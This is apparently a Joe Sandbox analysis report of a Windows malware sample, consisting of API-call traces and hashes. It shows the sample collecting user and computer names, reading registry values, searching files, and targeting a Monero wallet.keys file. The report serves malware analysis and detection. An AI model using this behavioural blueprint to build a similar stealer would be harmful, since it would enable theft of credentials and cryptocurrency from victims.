Part of subcall function 00827850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827880
Part of subcall function 00827850: RtlAllocateHeap.NTDLL(00000000), ref: 00827887
Part of subcall function 00827850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0082789F

Part of subcall function 008278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827910
Part of subcall function 008278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827917
Part of subcall function 008278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0082792F

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EF8850,?,0083110C,?,00000000,?,00831110,?,00000000,00830AEF), ref: 00826ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826AE8
CloseHandle.KERNEL32(00000000), ref: 00826AF9
Sleep.KERNEL32(00001770), ref: 00826B04
CloseHandle.KERNEL32(?,00000000,?,00EF8850,?,0083110C,?,00000000,?,00831110,?,00000000,00830AEF), ref: 00826B1A
ExitProcess.KERNEL32 ref: 00826B22

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: 77d50693ffed04dec458026d6c322bb3e7fc30c0cc7543a76a7e4d9fc9c25ef4
Instruction ID: f96043363fb80818971577aa0e5d778a9d77af3485b8683b3b20bbd84c25319c
Opcode Fuzzy Hash: 77d50693ffed04dec458026d6c322bb3e7fc30c0cc7543a76a7e4d9fc9c25ef4
Instruction Fuzzy Hash: CA311A70A00228ABDB08F7E8EC56AEEB778FF14741F004528F212E2181EF745985C6A3

Function 008199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008199EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819A11
LocalAlloc.KERNEL32(00000040,?), ref: 00819A31
ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 00819A5A
LocalFree.KERNEL32(0081148F), ref: 00819A90
CloseHandle.KERNEL32(000000FF), ref: 00819A9A

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 01faf5bae70ddf6413d463b049e971d79132e74e0a40f82306887903188471c0
Instruction ID: 717a52e7c765b039938542c6f6179190952d3f1c6d252e11c40d9ec35bf6a8fe
Opcode Fuzzy Hash: 01faf5bae70ddf6413d463b049e971d79132e74e0a40f82306887903188471c0
Instruction Fuzzy Hash: AB3149B4A00219EFDB14CF94D895BEE7BB8FF48341F108158E902E7290D734AA85CFA1

Function 00824780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00EFDA70), ref: 008247DB

Part of subcall function 00828DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

lstrcat.KERNEL32(?,00000000), ref: 00824801
lstrcat.KERNEL32(?,?), ref: 00824820
lstrcat.KERNEL32(?,?), ref: 00824834
lstrcat.KERNEL32(?,00EEB2E8), ref: 00824847
lstrcat.KERNEL32(?,?), ref: 0082485B
lstrcat.KERNEL32(?,00EFD0B8), ref: 0082486F

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 00828D90: GetFileAttributesA.KERNEL32(00000000,?,00811B54,?,?,0083564C,?,?,00830E1F), ref: 00828D9F

Part of subcall function 00824570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00824580
Part of subcall function 00824570: RtlAllocateHeap.NTDLL(00000000), ref: 00824587
Part of subcall function 00824570: wsprintfA.USER32 ref: 008245A6
Part of subcall function 00824570: FindFirstFileA.KERNEL32(?,?), ref: 008245BD

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 5c2c589b95634e27623d451023b4cf9a5ac57e9e608e27ee88331a9daad60dfa
Instruction ID: 5ba7b2eed53243ab40c46a773dda3f5428a2ab2b822a3407bbe6e7bf75468e81
Opcode Fuzzy Hash: 5c2c589b95634e27623d451023b4cf9a5ac57e9e608e27ee88331a9daad60dfa
Instruction Fuzzy Hash: AE3160B2A00318A7CB14FBA4EC86EED777CFB58700F404589B35996091EE7496C98B96

Function 008240B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00EFD338,00000000,00020119,?), ref: 008240F4
RegQueryValueExA.ADVAPI32(?,00EFDA28,00000000,00000000,00000000,000000FF), ref: 00824118
RegCloseKey.ADVAPI32(?), ref: 00824122
lstrcat.KERNEL32(?,00000000), ref: 00824147
lstrcat.KERNEL32(?,00EFD9E0), ref: 0082415B

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: d0f63b7d3db975d9cc03f9ebeb4105413e3127569c5c3527c9717640c4214b00
Instruction ID: d2b9805019c5a7f73802b482d2b8dc355a8765d43d89c84d7f05d6a0acd1010f
Opcode Fuzzy Hash: d0f63b7d3db975d9cc03f9ebeb4105413e3127569c5c3527c9717640c4214b00
Instruction Fuzzy Hash: 954185B69002086BDB14EBE4EC56FEE773DFB98300F004658B71696181EA755BC98B93

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 00827E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827E37
RtlAllocateHeap.NTDLL(00000000), ref: 00827E3E
RegOpenKeyExA.KERNEL32(80000002,00EEB818,00000000,00020119,?), ref: 00827E5E
RegQueryValueExA.KERNEL32(?,00EFCFF8,00000000,00000000,000000FF,000000FF), ref: 00827E7F
RegCloseKey.ADVAPI32(?), ref: 00827E92

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 05d65d9c6762d908bac3c8b30fba3fad69680a2044225a9c0c7294886fdfa6c0
Instruction ID: 5ae8a7a1c3543c66ac74367a10384e3bfdceb1ed5bbafb15664eeaf7977799d4
Opcode Fuzzy Hash: 05d65d9c6762d908bac3c8b30fba3fad69680a2044225a9c0c7294886fdfa6c0
Instruction Fuzzy Hash: AC116AB2A44309ABD700CBD5EC4AFABBBB8FB08B11F104219F605E7280D77458018BA2

Function 008112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008112B4
RtlAllocateHeap.NTDLL(00000000), ref: 008112BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008112D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008112F5
RegCloseKey.ADVAPI32(?), ref: 008112FF

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 7fcaa3dc39ed732f2a416d90a0ea3865e834e4216ef0bee3c99e512740bda267
Instruction ID: 691c2513aa9d2f91e078aba62798a67231f97f6350e72ccc5f216bba402a3e94
Opcode Fuzzy Hash: 7fcaa3dc39ed732f2a416d90a0ea3865e834e4216ef0bee3c99e512740bda267
Instruction Fuzzy Hash: 5C01CDB9A40308BFDB04DFE4DC59FAEB7B8FB58701F108259FA05D7280D6759A418B51

Function 0081A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00EF8840,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0081A0BD
LoadLibraryA.KERNEL32(00EFD258), ref: 0081A146

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A820: lstrlen.KERNEL32(00814F05,?,?,00814F05,00830DDE), ref: 0082A82B
Part of subcall function 0082A820: lstrcpy.KERNEL32(00830DDE,00000000), ref: 0082A885

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

SetEnvironmentVariableA.KERNEL32(00EF8840,00000000,00000000,?,008312D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00830AFE), ref: 0081A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0081A0B2, 0081A0C6, 0081A0DC

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
